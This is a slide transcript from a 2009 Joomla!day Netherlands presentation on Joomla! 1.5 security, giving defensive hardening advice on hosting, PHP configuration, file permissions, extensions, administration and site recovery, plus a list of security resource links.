joomladay netherlands - security
TRANSCRIPT
![Page 1: Joomladay Netherlands - Security](https://reader033.vdocuments.net/reader033/viewer/2022050613/547f5ca4b4af9fbe788b492f/html5/thumbnails/1.jpg)
Joomla! 1.5 Security
Joomla!day Presentation
Utrecht, Netherlands
12 june 2009
![Page 2: Joomladay Netherlands - Security](https://reader033.vdocuments.net/reader033/viewer/2022050613/547f5ca4b4af9fbe788b492f/html5/thumbnails/2.jpg)
Is Joomla! safe?
![Page 3: Joomladay Netherlands - Security](https://reader033.vdocuments.net/reader033/viewer/2022050613/547f5ca4b4af9fbe788b492f/html5/thumbnails/3.jpg)
Is the World Wide Web Safe?
![Page 4: Joomladay Netherlands - Security](https://reader033.vdocuments.net/reader033/viewer/2022050613/547f5ca4b4af9fbe788b492f/html5/thumbnails/4.jpg)
You know, I don't mean any disrespect, but I had to chuckle by the question "Is Joomla! not safe?" since it reminded me of the movie The Marathon Man when the dentist is pulling Dustin Hoffman's teeth out, asking "Is it safe?" and he's so desperate to get the Dentist to stop that he says Yes or No or What do you want to hear?
Is Joomla! safe?
Quote taken from:http://forum.joomla.org/viewtopic.php?f=432&t=318351&st=0&sk=t&sd=a
![Page 5: Joomladay Netherlands - Security](https://reader033.vdocuments.net/reader033/viewer/2022050613/547f5ca4b4af9fbe788b492f/html5/thumbnails/5.jpg)
5
![Page 6: Joomladay Netherlands - Security](https://reader033.vdocuments.net/reader033/viewer/2022050613/547f5ca4b4af9fbe788b492f/html5/thumbnails/6.jpg)
I would say - anyone who tells a community that a Web site or a out of the box solution
is safe is not being responsible. No, it is not "safe" on the Internet.
6
![Page 7: Joomladay Netherlands - Security](https://reader033.vdocuments.net/reader033/viewer/2022050613/547f5ca4b4af9fbe788b492f/html5/thumbnails/7.jpg)
What is this presentation about?
![Page 8: Joomladay Netherlands - Security](https://reader033.vdocuments.net/reader033/viewer/2022050613/547f5ca4b4af9fbe788b492f/html5/thumbnails/8.jpg)
Getting StartedHosting and Server SetupJoomla SetupSite AdministrationSite Recovery
Presentation overview
![Page 9: Joomladay Netherlands - Security](https://reader033.vdocuments.net/reader033/viewer/2022050613/547f5ca4b4af9fbe788b492f/html5/thumbnails/9.jpg)
9
Getting started
![Page 10: Joomladay Netherlands - Security](https://reader033.vdocuments.net/reader033/viewer/2022050613/547f5ca4b4af9fbe788b492f/html5/thumbnails/10.jpg)
10
Getting started
![Page 11: Joomladay Netherlands - Security](https://reader033.vdocuments.net/reader033/viewer/2022050613/547f5ca4b4af9fbe788b492f/html5/thumbnails/11.jpg)
11
Getting started
![Page 12: Joomladay Netherlands - Security](https://reader033.vdocuments.net/reader033/viewer/2022050613/547f5ca4b4af9fbe788b492f/html5/thumbnails/12.jpg)
Some basic things before we go into details:Report (possible) hack to JSSThttp://developer.joomla.org/security/contact-the-team.html
Please don’t report hacks or proof-of-concepts out in the open, also report them to JSSTStay informed! Automatic Email Notificationhttp://feedburner.google.com/fb/a/mailverify?uri=JoomlaSecurityNews
RSS feedhttp://feeds.joomla.org/JoomlaSecurityNews
12
Getting started
![Page 13: Joomladay Netherlands - Security](https://reader033.vdocuments.net/reader033/viewer/2022050613/547f5ca4b4af9fbe788b492f/html5/thumbnails/13.jpg)
13
Hosting and server set up
Shared hosting?
Or
Dedicated hosting?
![Page 14: Joomladay Netherlands - Security](https://reader033.vdocuments.net/reader033/viewer/2022050613/547f5ca4b4af9fbe788b492f/html5/thumbnails/14.jpg)
14
Hosting and server set up
“register_globals”
“open_basedir”
![Page 15: Joomladay Netherlands - Security](https://reader033.vdocuments.net/reader033/viewer/2022050613/547f5ca4b4af9fbe788b492f/html5/thumbnails/15.jpg)
Configure Apache:Secure important areas with .htaccessUse mod_rewrite and mod_security to block PHP attacks
Configure MySQLImplement user accounts with “need-to-know” principle
Configure PHPUse PHP 5!Configure your php.ini file properly (most of the times limited with shared hosts)
15
Hosting and server set up
![Page 16: Joomladay Netherlands - Security](https://reader033.vdocuments.net/reader033/viewer/2022050613/547f5ca4b4af9fbe788b492f/html5/thumbnails/16.jpg)
Configure php.iniUse “disable_functions” to disable dangerous PHP functions that are not needed by your site.“Use PHP open_basedir”Don't use “PHP safe_mode” (it gives a false sense of security)Don't use “PHP register_globals”Don't use “PHP allow_url_fopen”. This option enables the URL-aware fopen wrappers that enable accessing URL object like files.
16
![Page 17: Joomladay Netherlands - Security](https://reader033.vdocuments.net/reader033/viewer/2022050613/547f5ca4b4af9fbe788b492f/html5/thumbnails/17.jpg)
17
Joomla! setup
![Page 18: Joomladay Netherlands - Security](https://reader033.vdocuments.net/reader033/viewer/2022050613/547f5ca4b4af9fbe788b492f/html5/thumbnails/18.jpg)
Some basic rules to think about:Only install official Joomla! versions!Change the default administrator usernameProtect directories and filesMove crucial files outside public directoryhttp://docs.joomla.org/Security_and_Performance_FAQs#How_do_I_move_confidential_files_outside_of_public_html.3F
Ensure that all configurable paths to writable or uploadable directories
Protect your log directory (moving it out of document root or .htaccess protect it)
Adjust file and directory permissionsSet critical directories to 755
Set file permissions to 644
Remove unneeded files18
Joomla! setup
![Page 19: Joomladay Netherlands - Security](https://reader033.vdocuments.net/reader033/viewer/2022050613/547f5ca4b4af9fbe788b492f/html5/thumbnails/19.jpg)
Before you install extensionsAlways backup (even on your test system)Always test before you install on your life serverCheck for extension vulnerabilitiesDownload from trusted sitesUser beware! Check the code qualityTest! Test! Test!Remove junk files (all that is not needed)Avoid encrypted code
19
Joomla! setup
![Page 20: Joomladay Netherlands - Security](https://reader033.vdocuments.net/reader033/viewer/2022050613/547f5ca4b4af9fbe788b492f/html5/thumbnails/20.jpg)
20
Site administration
![Page 21: Joomladay Netherlands - Security](https://reader033.vdocuments.net/reader033/viewer/2022050613/547f5ca4b4af9fbe788b492f/html5/thumbnails/21.jpg)
Use well-formed passwordsMaintain a strong site backup processMonitor crack attempts (tripwire, SAMHAIN)Perform manual intrusion detection (manual logfile scan)Stay current with security patches and upgrades
21
Site administration
![Page 22: Joomladay Netherlands - Security](https://reader033.vdocuments.net/reader033/viewer/2022050613/547f5ca4b4af9fbe788b492f/html5/thumbnails/22.jpg)
Get help the right wayFollow a logical and rigorous recovery process Reset your administrator password (and all admins/super admins)Find exploit attempts using the *NIX shell
22
Site recovery
![Page 23: Joomladay Netherlands - Security](https://reader033.vdocuments.net/reader033/viewer/2022050613/547f5ca4b4af9fbe788b492f/html5/thumbnails/23.jpg)
23
Links
![Page 24: Joomladay Netherlands - Security](https://reader033.vdocuments.net/reader033/viewer/2022050613/547f5ca4b4af9fbe788b492f/html5/thumbnails/24.jpg)
Documentation wiki : http://docs.joomla.org/Category:Security_Checklist
Joomla! Security Strike Team (JSST): http://developer.joomla.org/security.html
Report issues to JSST : http://developer.joomla.org/security/contact-the-team.html
24
Links
![Page 25: Joomladay Netherlands - Security](https://reader033.vdocuments.net/reader033/viewer/2022050613/547f5ca4b4af9fbe788b492f/html5/thumbnails/25.jpg)
Joomla! related
www.joomla.org
developer.joomla.org/security.html
www.secunia.org
www.milw0rm.com
Sites to put RSS feeds on
http://feedburner.google.com/fb/a/mailverify?uri=JoomlaSecurityNews
General
www.us-cert.gov
www.frsirt.com
Operating systems related
www.debian.org/security
www.openbsd.org/security
www.redhat.org/apps/support
25
Sites to monitor when you take security seriously
![Page 26: Joomladay Netherlands - Security](https://reader033.vdocuments.net/reader033/viewer/2022050613/547f5ca4b4af9fbe788b492f/html5/thumbnails/26.jpg)
26
Questions?
![Page 27: Joomladay Netherlands - Security](https://reader033.vdocuments.net/reader033/viewer/2022050613/547f5ca4b4af9fbe788b492f/html5/thumbnails/27.jpg)